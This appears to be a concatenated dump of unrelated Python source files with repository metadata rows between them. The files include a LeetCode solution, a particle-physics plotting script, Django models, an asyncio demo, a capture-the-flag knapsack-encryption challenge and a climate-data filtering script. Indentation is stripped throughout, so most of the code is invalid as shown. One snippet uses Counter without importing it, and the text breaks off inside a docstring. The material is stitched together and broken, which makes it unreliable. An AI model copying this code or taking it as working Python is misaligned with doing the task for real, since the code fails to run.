n = int(input())
s = input()
mod = 10**9+7
scnt = Counter(s).most_common()
ans = 1
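# Each distinct character contributes (count + 1) choices (take 0..count copies); subtract 1 to exclude taking nothing.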
for i in range(len(scnt)):
ans = ans*(scnt[i][1]+1)%mod
ans = (ans - 1 + mod)%mod
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
54e92565033d5c76621554dac95020cc7b579dc2
|
fa5713863cada0177d15e56f5327b79d907a119f
|
/test/compare_releases.py
|
70cf5e5907f8577f16a47c9a3461b04ef5c48543
|
[] |
no_license
|
rappoccio/EXOVV
|
1500c126d8053b47fbc425d1c2f9e76f14cb75c5
|
db96edf661398b5bab131bbeba36d331b180d12d
|
refs/heads/master
| 2020-04-03T20:12:57.959191
| 2018-08-24T01:30:03
| 2018-08-24T01:30:03
| 39,910,319
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,404
|
py
|
#!/usr/bin/env python
from optparse import OptionParser
from jettools import getJER
from math import sqrt
parser = OptionParser()
parser.add_option('--outname', type='string', action='store',
dest='outname',
default = "",
help='Histogram to plot')
(options, args) = parser.parse_args()
argv = []
print options
import ROOT
import array
import math
import random
ROOT.gStyle.SetOptStat(000000)
#ROOT.gROOT.Macro("rootlogon.C")
#ROOT.gStyle.SetPadRightMargin(0.15)
ROOT.gStyle.SetOptStat(000000)
ROOT.gStyle.SetTitleFont(43)
#ROOT.gStyle.SetTitleFontSize(0.05)
ROOT.gStyle.SetTitleFont(43, "XYZ")
ROOT.gStyle.SetTitleSize(30, "XYZ")
ROOT.gStyle.SetTitleOffset(3.5, "X")
ROOT.gStyle.SetTitleOffset(1.5, "Y")
ROOT.gStyle.SetLabelFont(43, "XYZ")
ROOT.gStyle.SetLabelSize(24, "XYZ")
def setupPads(canv, pads):
canv.cd()
pad1 = ROOT.TPad('pad' + canv.GetName() + '1', 'pad' + canv.GetName() + '1', 0., 0.3, 1.0, 1.0)
pad1.SetBottomMargin(0)
pad2 = ROOT.TPad('pad' + canv.GetName() + '2', 'pad' + canv.GetName() + '2', 0., 0.0, 1.0, 0.3)
pad2.SetTopMargin(0)
pad1.SetLeftMargin(0.20)
pad2.SetLeftMargin(0.20)
pad2.SetBottomMargin(0.5)
pad1.Draw()
pad2.Draw()
pads.append( [pad1,pad2] )
return [pad1, pad2]
samples = [
['responses_repdf_otherway_qcdmc_2dplots.root', '7.6.x', 1, 1],
['responses_otherway_qcdmc.root', '7.4.x', 2, 2]
]
names = [
"h_pt_meas",
"h_y_meas",
"h_phi_meas",
"h_m_meas",
"h_msd_meas",
"h_rho_meas",
"h_tau21_meas",
"h_dphi_meas",
"h_ptasym_meas",
]
hists = []
stacks = []
f = []
legs = []
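# Load each sample's histograms and tag them with that sample's line style and colour for the overlay.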
for isample in xrange( len(samples) ) :
f.append( ROOT.TFile(samples[isample][0] ) )
hists.append( [] )
for iname in xrange( len(names) ) :
htemp = f[isample].Get(names[iname] )
htemp.UseCurrentStyle()
#if htemp.Integral() > 0 :
# htemp.Scale( 1.0 / htemp.Integral() )
htemp.SetLineStyle(samples[isample][2])
htemp.SetLineColor(samples[isample][3])
hists[isample].append( htemp )
canvs = []
allpads = []
ratios = []
for iname in xrange( len(names) ) :
c = ROOT.TCanvas("c" + str(iname), "c" + str(iname), 800, 600 )
pads = setupPads(c, allpads)
pads[0].cd()
hists[0][iname].Draw("hist")
hists[1][iname].Draw("hist same")
leg = ROOT.TLegend(0.6, 0.6, 0.85, 0.85)
leg.SetFillColor(0)
leg.SetBorderSize(0)
leg.AddEntry( hists[0][iname], samples[0][1], 'l' )
leg.AddEntry( hists[1][iname], samples[1][1], 'l' )
leg.Draw()
legs.append(leg)
max0 = hists[0][iname].GetMaximum()
max1 = hists[1][iname].GetMaximum()
maxtot = max( max0, max1) * 1.2
hists[0][iname].SetMaximum(maxtot)
pads[0].SetLogy()
pads[0].Update()
pads[1].cd()
ratio = hists[1][iname].Clone( hists[1][iname].GetName() + "clone")
ratio.Divide( hists[0][iname] )
ratio.SetTitle("")
ratio.GetYaxis().SetTitle("Ratio")
ratio.Draw("e")
ratio.GetYaxis().SetRangeUser(0.9,1.1)
ratio.GetYaxis().SetNdivisions(2,4,0,False)
ratios.append(ratio)
pads[1].Update()
c.Update()
c.Print( 'compare_' + options.outname + names[iname] + ".png", "png")
c.Print( 'compare_' + options.outname + names[iname] + ".pdf", "pdf")
canvs.append(c)
|
[
"rappoccio@gmail.com"
] |
rappoccio@gmail.com
|
4d422bbbbeeb2c15974cfa4de441a3c6671ccf70
|
3a857528f238c9460fd7c14fc0477a9bee0974a5
|
/ipycanvas/_frontend.py
|
2da2ede4429a6af5aed88050218d375c62a47c5c
|
[
"BSD-3-Clause"
] |
permissive
|
amoeba/ipycanvas
|
aafb38b341828f0ff69cc4816ea3ab169096c251
|
0cc98b4d0cd1dc7a0b4057fe8d5d276efdb55928
|
refs/heads/master
| 2023-02-04T21:58:01.556211
| 2020-12-17T20:42:01
| 2020-12-17T20:42:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Martin Renou.
# Distributed under the terms of the Modified BSD License.
"""
Information about the frontend package of the widgets.
"""
module_name = "ipycanvas"
module_version = "^0.7.0"
|
[
"martin.renou@gmail.com"
] |
martin.renou@gmail.com
|
8f0e1b6af08c0ba68ced1a36c3dd18973cf224ab
|
5292b03998384c0d2bb5858058892d7e45c5365b
|
/InCTF/2021/crypto/Lost_Baggage/main.py
|
2db4763071280ad4c8a5294fa28c99cb3bb0c207
|
[
"MIT"
] |
permissive
|
TheusZer0/ctf-archives
|
430ef80d367b44fd81449bcb108e367842cb8e39
|
033ccf8dab0abdbdbbaa4f0092ab589288ddb4bd
|
refs/heads/main
| 2023-09-04T17:56:24.416820
| 2021-11-21T06:51:27
| 2021-11-21T06:51:27
| 430,603,430
| 1
| 0
|
MIT
| 2021-11-22T07:24:08
| 2021-11-22T07:24:07
| null |
UTF-8
|
Python
| false
| false
| 1,119
|
py
|
#!/usr/bin/python3
from random import getrandbits as rand
from gmpy2 import next_prime, invert
import pickle
FLAG = open('flag.txt', 'rb').read()
BUF = 16
def encrypt(msg, key):
msg = format(int(msg.hex(), 16), f'0{len(msg)*8}b')[::-1]
assert len(msg) == len(key)
return sum([k if m=='1' else 0 for m, k in zip(msg, key)])
def decrypt(ct, pv):
b, r, q = pv
ct = (invert(r, q)*ct)%q
msg = ''
for i in b[::-1]:
if ct >= i:
msg += '1'
ct -= i
else:
msg += '0'
return bytes.fromhex(hex(int(msg, 2))[2:])
def gen_inc_list(size, tmp=5):
b = [next_prime(tmp+rand(BUF))]
while len(b)!=size:
val = rand(BUF)
while tmp<sum(b)+val:
tmp = next_prime(tmp<<1)
b += [tmp]
return list(map(int, b))
def gen_key(size):
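    # Knapsack-style key generation: the private superincreasing list b is disguised as pb via modular multiplication by r mod q.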
b = gen_inc_list(size)
q = b[-1]
for i in range(rand(BUF//2)):
q = int(next_prime(q<<1))
r = b[-1]+rand(BUF<<3)
pb = [(r*i)%q for i in b]
return (b, r, q), pb
if __name__ == '__main__':
pvkey, pbkey = gen_key(len(FLAG) * 8)
cip = encrypt(FLAG, pbkey)
assert FLAG == decrypt(cip, pvkey)
pickle.dump({'cip': cip, 'pbkey': pbkey}, open('enc.pickle', 'wb'))
|
[
"sajjadium@google.com"
] |
sajjadium@google.com
|
12cf8b1fc6f4b7f9991b27ccfa0db18d53281139
|
d96ffbadf4526db6c30a3278f644c1bc25ff4054
|
/src/flickr/city.py
|
54ab51925d971f99e12f845cbc74900f03e05b10
|
[
"MIT"
] |
permissive
|
dballesteros7/master-thesis-2015
|
07c03726f6ceb66e6d706ffe06e4e5eb37dcda75
|
8c0bf9a6eef172fc8167a30780ae0666f8ea2d88
|
refs/heads/master
| 2021-05-03T11:22:28.333473
| 2016-04-26T14:00:30
| 2016-04-26T14:00:30
| 44,601,064
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 563
|
py
|
from enum import Enum
from flickr.boundingbox import BoundingBox
class City(Enum):
LONDON = ('london', BoundingBox(51.672343, 0.148271, 51.384940, -0.351468))
ZURICH = ('zurich', BoundingBox(47.434680, 8.625370, 47.320230, 8.448060))
NEW_YORK = ('new-york', BoundingBox(40.915256, -73.700272, 40.491370, -74.259090))
SHANGHAI = ('shanghai', BoundingBox(31.868217, 122.247066, 30.680270, 120.858217))
def __init__(self, city_name: str, bounding_box: BoundingBox):
self.city_name = city_name
self.bounding_box = bounding_box
|
[
"diegob@student.ethz.ch"
] |
diegob@student.ethz.ch
|
52ea565222d6051d93f5b73b48e501c55e9bd1ce
|
736032949e6ec4291dba0b06a441efe9d8ad2b82
|
/colegio/models.py
|
451bf327c02291b724848dab273618cf88c656d4
|
[] |
no_license
|
CoriAle/Examen-Final
|
b93498e10818d91cb672ef216dbc1663cb1973ef
|
bcbdecce989ee55e85c0dbfbf22c20950bfd2199
|
refs/heads/master
| 2021-08-26T05:32:34.204416
| 2017-11-21T18:56:45
| 2017-11-21T18:56:45
| 111,577,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
from django.db import models
from django.utils import timezone
from django.contrib import admin
class Alumno(models.Model):
carnet=models.CharField(max_length=50)
nombre=models.CharField(max_length=50)
apellido=models.CharField(max_length=50)
fecha_nacimiento = models.DateField()
def __str__(self):
return '{}'.format(self.nombre)
class Profesor(models.Model):
nombre=models.CharField(max_length=50)
apellido=models.CharField(max_length=50)
fecha_nacimiento = models.DateField()
profesion=models.CharField(max_length=50)
def __str__(self):
return '{}'.format(self.nombre)
class Materia(models.Model):
nombre=models.CharField(max_length=50)
creditos= models.IntegerField()
alumno = models.ManyToManyField(Alumno, through='Nota')
    profesor = models.ForeignKey(Profesor, null=True, on_delete=models.CASCADE)  # on_delete is required on Django 2.0+
def __str__(self):
return '{}'.format(self.nombre)
class Nota (models.Model):
material = models.ForeignKey(Materia, on_delete=models.CASCADE)
alumno = models.ForeignKey(Alumno, on_delete=models.CASCADE)
nota = models.CharField(max_length=50, blank=True)
class NotaInLine(admin.TabularInline):
model = Nota
extra = 1
class MateriaAdmin(admin.ModelAdmin):
inlines = (NotaInLine,)
class AlumnoAdmin (admin.ModelAdmin):
inlines = (NotaInLine,)
class Grado(models.Model):
"""docstring forGrado."""
nombre = models.CharField(max_length=50)
seccion = models.CharField(max_length=10)
materia = models.ManyToManyField(Materia, blank=True)
def __str__(self):
return '{}'.format(self.nombre)
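# MateriaAdmin and AlumnoAdmin above are declared but never registered; a
# minimal sketch of the registration that would normally accompany them
# (an assumption -- the original file stops before this step):
admin.site.register(Alumno, AlumnoAdmin)
admin.site.register(Materia, MateriaAdmin)
admin.site.register(Profesor)
admin.site.register(Grado)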
|
[
"1995coral@hotmail.es"
] |
1995coral@hotmail.es
|
127b3622e28069bc808f7dc1542354d21e9dce3c
|
80b5bc903e5ceb368f374f9a1313e1dc7ac698c2
|
/bcoffice/members/views/member_force_disable.py
|
1dbe2b8b190ef21b05374aca59a95a45fed30cbc
|
[] |
no_license
|
Bobur-kobilov/back
|
830471f7d36f9120aa04e3ae884f7091f0ba4333
|
5a852c4d24da3db6226ce17c437c4ae9c6b01141
|
refs/heads/master
| 2022-10-01T22:50:24.073570
| 2019-08-02T01:51:19
| 2019-08-02T01:51:19
| 200,145,509
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,360
|
py
|
from . import *
import pytz
# Force-change a member's account status
class MemberForceDisable(APIView):
name = "member-force-disable"
permission_classes = [MemberForceDisablePermission]
def put(self, request, *args, **kwargs):
member_id = request.data.get('member_id', None)
reason = request.data.get('reason', None)
authType = request.data.get('authType', None)
if member_id is None:
return Response( # "{0} 파라미터가 없습니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00017.format('member_id'))
, status=status.HTTP_400_BAD_REQUEST
)
auth_type = None
request_after = None
if authType == 'factor_auth':
auth_type = request.data.get('auth_type', None)
if auth_type is None:
return Response( # "{0} 파라미터가 없습니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00017.format('auth_type'))
, status=status.HTTP_400_BAD_REQUEST
)
else:
request_after = request.data.get('after', None)
if request_after is None:
return Response( # "{0} 파라미터가 없습니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00017.format('after'))
, status=status.HTTP_400_BAD_REQUEST
)
category = ""
if authType == 'factor_auth':
factor_type = ""
if auth_type == 'app':
category = "OTP 인증해제"
factor_type = "TwoFactor::App"
elif auth_type == 'sms':
category = "SMS 인증해제"
factor_type = "TwoFactor::Sms"
before = (TwoFactors.objects.using("exchange").filter(member_id=member_id).filter(type=factor_type))[0].activated
after = int(not before)
else:
VALUE_BY_TYPE = {
'kyc_auth' : {'category': '신분증 인증', 'db_column': 'kyc_activated'},
'disable': {'category': '계정비활성화', 'db_column': 'disabled'},
'restrict': {'category': '이용제한', 'db_column': 'restricted'},
'deleted': {'category': '회원탈퇴', 'db_column': 'deleted'},
}
category = VALUE_BY_TYPE[authType]['category']
column = VALUE_BY_TYPE[authType]['db_column']
before = Members.objects.using("exchange").values(column).get(id=member_id)[column]
after = request_after
if before == after:
return Response( # "현재상태와 변경하려는 상태가 동일합니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00032)
, status=status.HTTP_400_BAD_REQUEST
)
user = User.objects.get(id=request.user.get_id())
body = {
"user_id": request.user.get_id()
, "emp_no": user.emp_no
, "member_id": int(member_id)
, "category": category
, "before": before
, "after": after
, "reason": reason
, "created_at": str(datetime.now(pytz.timezone('Asia/Seoul')))
}
API_BY_TYPE = {
'factor_auth': {'api': APIService.MEMBER_TWO_FACTOR, 'params': {'member_id': member_id, 'auth_type': auth_type}},
'kyc_auth': {'api': APIService.MEMBER_KYC_AUTH, 'params': {'member_id': member_id, 'active': request_after}},
'disable': {'api': APIService.MEMBER_DISABLE, 'params': {'member_id': member_id, 'disable': request_after}},
'restrict': {'api': APIService.MEMBER_RESTRICT, 'params': {'member_id': member_id, 'restrict': request_after}},
'deleted': {'api': APIService.MEMBER_DELETED, 'params': {'member_id': member_id}},
}
response = APIService.request_api(request, API_BY_TYPE[authType]['api'], API_BY_TYPE[authType]['params'])
log = CentralLogging()
log.setLog(body, request, UPDATE, response.status_code, 1200)
        # Also write the audit record to MongoDB
# body = json.dumps(log).encode('utf8')
logging_utils.set_log(TBL_BCOFFICE_MEMBER_MOD, log.toJsonString())
return response
|
[
"bobur0114jon@gmail.com"
] |
bobur0114jon@gmail.com
|
5e8d232feecaf3739a9c05723fb003384adf5152
|
23ae328d533fafdeb8b49b8a66911a9e9aef4e83
|
/exercises/1901090010/1001S02E06_stats_word.py
|
0b2d0b586169d3cc48703ba0459b9c517888bf39
|
[] |
no_license
|
sky3116391/selfteaching-python-camp
|
85b35ba16e014e7d1c2545e450a22021acd668e7
|
635a74035b37bdd4e37919a81848e86bdb853a11
|
refs/heads/master
| 2020-05-25T15:51:30.853311
| 2019-05-30T06:49:20
| 2019-05-30T06:49:20
| 187,006,599
| 0
| 0
| null | 2019-05-16T10:32:55
| 2019-05-16T10:32:55
| null |
UTF-8
|
Python
| false
| false
| 3,945
|
py
|
import re
# (1) Define a function named stats_text_en
def stats_text_en(text):
    # (2) The function takes a string `text` as its argument; if it is not a string, return a prompt
    if not isinstance(text, str):
        return '请输入字符串'
    # (3) Count how many times each English word occurs in the argument
    # 1. Strip out the punctuation
    word_str = text.replace(','," ").replace('.'," ").replace('!'," ").replace('*'," ").replace('--'," ")
    # 2. Split the text into words on whitespace
    word_list = word_str.split()
    # 3. De-duplicate the words; these become the dictionary keys
    word_one = set(word_list)
    # 4. Build a word-frequency dictionary
    counts = {}
    for word in word_one:
        counts[word] = word_list.count(word)
    # 5. Sort the frequency dictionary by value, in descending order
    d_list = sorted(counts.items(),key=lambda e:e[1],reverse=True)
    return d_list
# (1) Define a function named stats_text_cn
def stats_text_cn(text):
    # (2) The function takes a string `text` as its argument; if it is not a string, return a prompt
    if not isinstance(text, str):
        return '请输入字符串'
    # 1. Strip out the punctuation
    d = text.replace(',','').replace('-',' ').replace('.','').replace(':','').replace('《','').replace(';','').replace('"','').replace('!','').replace('?','').replace('》',' ').replace('、','').replace(',','').replace('。','').replace('“','').replace('”','').replace(':','').replace(';','').replace('\n','').replace('!','').replace('?','').replace('/','').replace('*',' ').replace(' ','').replace("'",'')
    # 2. Use a regex to strip all ASCII letters and digits from the string
    d = re.sub("[A-Za-z0-9]", "", d)
    print(d)
    # 3. De-duplicate the Chinese characters; these become the dictionary keys
    d_list = list(d)
    print(d_list)
    d_index = set(d_list)
    # 4. Build a character-frequency dictionary
    counts = {}
    for i in d_index:
        counts[i] = d_list.count(i)
    # 5. Sort the frequency dictionary by value, in descending order
    d_list = sorted(counts.items(),key=lambda e:e[1],reverse=True)
    return d_list
if __name__ == "__main__":
    # Test the English word-frequency function
text = '''
Fall Day (by J. B. Leishman)
Lord, it is time. This was a very big summer.
Lay your shadows over the sundial,
and let the winds loose on the fields.
Command the last fruits to be full;
give them two more sunny days,
urge them on to fulfillment and throw
the last sweetness into the heavy wine.
Who has no house now, will never build one.
Whoever is alone now, will long remain so,
Will watch, read, write long letters
and will wander in the streets, here and there
restlessly, when the leaves blow.
'''
    # Test the non-string case
    test_num = 1
    print(stats_text_en(test_num))
    # Test the normal case
    array = stats_text_en(text)
    print(array)
    # Test the Chinese character-frequency function
text = '''
English : Fall Day by J. B. Leishman
Lord, it is time. This was a very big summer.
Lay your shadows over the sundial,
and let the winds loose on the fields.
Command the last fruits to be full;
give them two more sunny days,
urge them on to fulfillment and throw
the last sweetness into the heavy wine.
Who has no house now, will never build one.
Whoever is alone now, will long remain so,
Will watch, read, write long letters
and will wander in the streets, here and there
restlessly, when the leaves blow.
中译一:《秋日》 冯至
1905-1993。著名诗人、翻译家。
主啊!是时候了。夏日曾经很盛大。
把你的阴影落在日规上,
让秋风刮过田野。
让最后的果实长得丰满,
再给它们两天南方的气候,
迫使它们成熟,
把最后的甘甜酿入浓酒。
谁这时没有房屋,就不必建筑,
谁这时孤独,就永远孤独,
就醒着,读着,写着长信,
在林荫道上来回
不安地游荡,当着落叶纷飞。
'''
    # Run the Chinese character-frequency function on the mixed text above
array = stats_text_cn(text)
print(array)
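# The same count-then-sort steps, sketched with collections.Counter; this
# helper is illustrative and not part of the original exercise:
from collections import Counter

def stats_text_en_counter(text):
    # Counter counts in one pass; most_common() returns (word, count) pairs
    # already sorted by count in descending order.
    words = re.sub(r'--|[,.!*]', ' ', text).split()
    return Counter(words).most_common()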
|
[
"46160162+EthanYan6@users.noreply.github.com"
] |
46160162+EthanYan6@users.noreply.github.com
|
99a090ec7d96de49b32002c3d389094efe608890
|
b6233af6a39e7ab500743d6b2ac7d52f68ae3be2
|
/19/00/2.py
|
9a4163a95b325fbdda531426194e1e107c5ac754
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201712
|
9754526e1d8f1c0519fcce98bc7df803f456cc4e
|
f18f1251074729c4a3865b113edc89ec06b54130
|
refs/heads/master
| 2021-09-02T06:08:08.278115
| 2017-12-30T23:04:55
| 2017-12-30T23:04:55
| 112,670,974
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 736
|
py
|
import asyncio
try:
from socket import socketpair
except ImportError:
from asyncio.windows_utils import socketpair
# Create a pair of connected file descriptors
rsock, wsock = socketpair()
loop = asyncio.get_event_loop()
def reader():
data = rsock.recv(100)
print("Received:", data.decode())
# We are done: unregister the file descriptor
loop.remove_reader(rsock)
# Stop the event loop
loop.stop()
# Register the file descriptor for read event
loop.add_reader(rsock, reader)
# Simulate the reception of data from the network
loop.call_soon(wsock.send, 'abc'.encode())
# Run the event loop
loop.run_forever()
# We are done, close sockets and the event loop
rsock.close()
wsock.close()
loop.close()
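# The same watch-a-socket pattern sketched in newer asyncio style (3.7+),
# where the loop is obtained inside a coroutine and driven by asyncio.run();
# the names below (modern_variant, on_readable) are illustrative assumptions.
import socket

async def modern_variant():
    rs, ws = socket.socketpair()
    loop2 = asyncio.get_running_loop()
    done = asyncio.Event()

    def on_readable():
        print("Received:", rs.recv(100).decode())
        loop2.remove_reader(rs)   # unregister once the data has arrived
        done.set()                # let the coroutine finish

    loop2.add_reader(rs, on_readable)
    loop2.call_soon(ws.send, b'abc')
    await done.wait()
    rs.close()
    ws.close()

# To try it: asyncio.run(modern_variant())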
|
[
"pylangstudy@yahoo.co.jp"
] |
pylangstudy@yahoo.co.jp
|
ffff5d674aabfb39a7fe604058e907e6a8469b8d
|
af71dc3825a4ad9f8f3582a1532828d680005dea
|
/social/__init__.py
|
895ff9af9158dab005e6dc20c74f0c3c076e27b9
|
[
"BSD-2-Clause",
"Python-2.0",
"BSD-3-Clause"
] |
permissive
|
loitd/python-social-auth
|
48c81b05858e9aabecd7989f6721018da14406d7
|
3a2e40c1d4341a0237363e28928b540ba7e7a49b
|
refs/heads/master
| 2021-07-15T17:07:17.700728
| 2016-04-29T16:40:05
| 2016-04-29T16:42:53
| 58,113,389
| 0
| 0
|
NOASSERTION
| 2021-03-20T05:01:35
| 2016-05-05T07:40:35
|
Python
|
UTF-8
|
Python
| false
| false
| 212
|
py
|
"""
python-social-auth application, allows OpenId or OAuth user
registration/authentication just adding a few configurations.
"""
version = (0, 2, 19)
extra = ''
__version__ = '.'.join(map(str, version)) + extra
|
[
"matiasaguirre@gmail.com"
] |
matiasaguirre@gmail.com
|
30aadff3b0ad693ad37410c5ddadb1a597999933
|
9f86a677c78db9b670759595b3b8b1a7f233acfd
|
/listings/admin.py
|
f8e5077d979804e2802b8dda4a1599caec15823d
|
[] |
no_license
|
husainr/btre_project
|
0337f8e705ca59460a62da06f54905fff4b50841
|
e5bfbdc5d9e214d04aa212badeaca09fb2f37090
|
refs/heads/master
| 2020-04-20T07:00:44.152929
| 2019-01-28T14:26:25
| 2019-01-28T14:26:25
| 168,700,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
from django.contrib import admin
from .models import Listing
class ListingAdmin(admin.ModelAdmin):
list_display = ('id','title','is_published','price','list_date','realtor')
list_display_links = ('id','title')
list_filter = ('realtor',)
list_editable = ('is_published',)
search_fields = ('title','description','address','city','price')
list_per_page = 25
admin.site.register(Listing, ListingAdmin)
|
[
"you@example.com"
] |
you@example.com
|
827af1cf985b10a20d8f337fcaae5cbb62d5988b
|
23165420a2ced2306c1154cbd479e67006860e87
|
/Algorithms/二叉搜索树的最近公共祖先.py
|
91ed039655c7be3b5e96ef60887d3ebe524a141a
|
[] |
no_license
|
pppineapple/LeetCode
|
8a446a65f99e2f2c572696caca2550c6e3bd8acc
|
e41a86e9d4615079247ef3ef9a35537f4b40d338
|
refs/heads/master
| 2020-04-06T14:54:02.475837
| 2018-11-19T09:38:56
| 2018-11-19T09:38:56
| 157,558,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,737
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 23 22:29:22 2018
@author: pineapple
"""
'''
Given a binary search tree, find the lowest common ancestor of two given nodes in the tree.

The definition of lowest common ancestor on Baidu Baike: for two nodes p and q of a
rooted tree T, the lowest common ancestor is a node x such that x is an ancestor of
both p and q and the depth of x is as large as possible (a node may also be an
ancestor of itself).

For example, given the following binary search tree: root = [6,2,8,0,4,7,9,null,null,3,5]

        _______6______
       /              \
    ___2__          ___8__
   /      \        /      \
   0      _4       7       9
         /  \
         3   5

Example 1:
Input: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 8
Output: 6
Explanation: The lowest common ancestor of nodes 2 and 8 is 6.

Example 2:
Input: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 4
Output: 2
Explanation: The lowest common ancestor of nodes 2 and 4 is 2, since by definition
a node can be its own ancestor.

Notes:
All node values are unique.
p and q are distinct nodes and both are present in the given binary search tree.
'''
'''
Someone else's solution: time complexity O(n), space complexity O(1).
Idea: recursion.

Because the problem says this is a binary search tree, i.e. root.left < root < root.right,
the lowest common ancestor of p and q must satisfy p.val <= root.val <= q.val
(this assumes p.val < q.val; the actual function takes the max and min of p.val and q.val).

So the recursive idea is: first take the max and min of p.val and q.val:
    minn = min(p.val, q.val)
    maxn = max(p.val, q.val)
If minn <= root.val <= maxn holds, root is the lowest common ancestor.
Otherwise, if root.val > maxn, both p and q are in root's left subtree,
so just recurse with self.lowestCommonAncestor(root.left, p, q).
Otherwise, if root.val < minn, both p and q are in root's right subtree,
so just recurse with self.lowestCommonAncestor(root.right, p, q).
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if not root:
return None
minn = min(p.val, q.val)
maxn = max(p.val, q.val)
if minn <= root.val <= maxn:
return root
elif root.val > maxn:
return self.lowestCommonAncestor(root.left, p, q)
elif root.val < minn:
return self.lowestCommonAncestor(root.right, p, q)
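# An equivalent iterative sketch, shown for comparison (an addition, not part
# of the original submission): walk down from the root, no recursion needed.
def lowest_common_ancestor_iterative(root, p, q):
    lo, hi = min(p.val, q.val), max(p.val, q.val)
    while root:
        if root.val > hi:        # both targets lie in the left subtree
            root = root.left
        elif root.val < lo:      # both targets lie in the right subtree
            root = root.right
        else:                    # lo <= root.val <= hi: this is the split point
            return root
    return None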
|
[
"504434414@qq.com"
] |
504434414@qq.com
|
9969c9d8301f7eb0cef375d5b636e00db8126cfb
|
d2cacbd1bde10e464faabc22ad5936f1aaf4e2ef
|
/data/DescLearning/SummerTests/RGBtrainD/Alexnet/BUTF/OTS/MAC-true/main.py
|
07ef2c62f3b6a26072f5d33198b09fcb7f045794
|
[] |
no_license
|
npiasco/dl_management
|
a26950a3b53c720d881a8b7ac3fa81161a048256
|
11c29a3637efa5fd223b36664d62c704e8166bab
|
refs/heads/master
| 2021-03-16T05:44:39.806437
| 2019-09-06T13:52:52
| 2019-09-06T13:52:52
| 124,055,338
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
#!/usr/bin/env python
import os, sys
import setlog
conf_file = os.environ['DEV'] + 'dl_management/.log/logging.yaml'
save_file = os.path.abspath(sys.argv[0])[:-len(sys.argv[0])] + 'log/'
setlog.reconfigure(conf_file, save_file)
import system.DescriptorLearning as System
if __name__ == '__main__':
machine = System.MultNet(root=os.path.abspath(sys.argv[0])[:-len(sys.argv[0])],
cnn_type='cnn.yaml',
dataset_file='../../../../../datasets/cmu_lt.yaml')
action = input('Exec:\n[t]\ttrain\n[e]\ttest\n[p]\tprint (console)\n[P]\tprint (full)\n[ ]\ttrain+test\n')
if action == 't':
machine.train()
elif action == 'e':
machine.test()
machine.plot(print_loss=False, print_val=False)
elif action == 'p':
machine.plot(print_loss=False, print_val=False)
elif action == 'P':
machine.plot()
elif action == '':
machine.train()
machine.test()
machine.plot(print_loss=False, print_val=False)
elif action == 's':
machine.serialize_net(final=False)
elif action == 'sf':
machine.serialize_net(final=True)
elif action == 'm':
machine.map_print('Main', final=False)
elif action == 'mf':
machine.map_print('Main', final=True)
elif action == 'jet':
machine.map_print()
elif action == 'dataset':
machine.print('train')
elif action == 'testq':
machine.print('test_query')
elif action == 'testd':
machine.print('test_data')
else:
raise ValueError('Unknown cmd: {}'.format(action))
|
[
"nathan.piasco@gmail.com"
] |
nathan.piasco@gmail.com
|
b83333bde4c5f401bfdfa13b41e2fcfc9a51c187
|
42fa1862effc3e494859904b76c43ce2bcd623a0
|
/low_high_band_pass_filtering.py
|
f4ad03423a9a9bded4c998b4dc162316a4c715fa
|
[] |
no_license
|
PaulHalloran/desktop_python_scripts
|
3e83aedf3e232da610b5f7477e4d7e8fb0253f99
|
325e923527278a5c3e9ab8c978f29b2816dab087
|
refs/heads/master
| 2021-01-01T19:52:06.828997
| 2015-06-27T21:14:10
| 2015-06-27T21:14:10
| 38,155,075
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,945
|
py
|
import iris
import matplotlib.pyplot as plt
import scipy.signal  # 'import scipy' alone does not load the signal submodule
import iris.quickplot as qplt
import numpy as np
'''
We will use the following functions, so make sure they are available
'''
def butter_bandpass(lowcut, cutoff):
order = 2
low = 1/lowcut
b, a = scipy.signal.butter(order, low , btype=cutoff,analog = False)
return b, a
def low_pass_filter(cube,limit_years):
b1, a1 = butter_bandpass(limit_years, 'low')
output = scipy.signal.filtfilt(b1, a1, cube,axis = 0)
return output
def high_pass_filter(cube,limit_years):
b1, a1 = butter_bandpass(limit_years, 'high')
output = scipy.signal.filtfilt(b1, a1, cube,axis = 0)
return output
'''
Initially just reading in a dataset to work with, and averaging lats and longs to give us a timeseries to plot - you can obviously swap in your timeseries
'''
file = '/media/usb_external1/cmip5/tas_regridded/MPI-ESM-P_tas_piControl_regridded.nc'
cube = iris.load_cube(file)
timeseries1 = cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
'''
Filtering out everything happening on timescales shorter than X years (where X is called lower_limit_years)
'''
lower_limit_years = 10.0
output_cube = cube.copy()
output_cube.data = low_pass_filter(cube.data,lower_limit_years)
timeseries2 = output_cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
plt.close('all')
qplt.plot(timeseries1 - np.mean(timeseries1.data),'r',alpha = 0.5,linewidth = 2)
qplt.plot(timeseries2 - np.mean(timeseries2.data),'g',alpha = 0.5,linewidth = 2)
plt.show(block = True)
'''
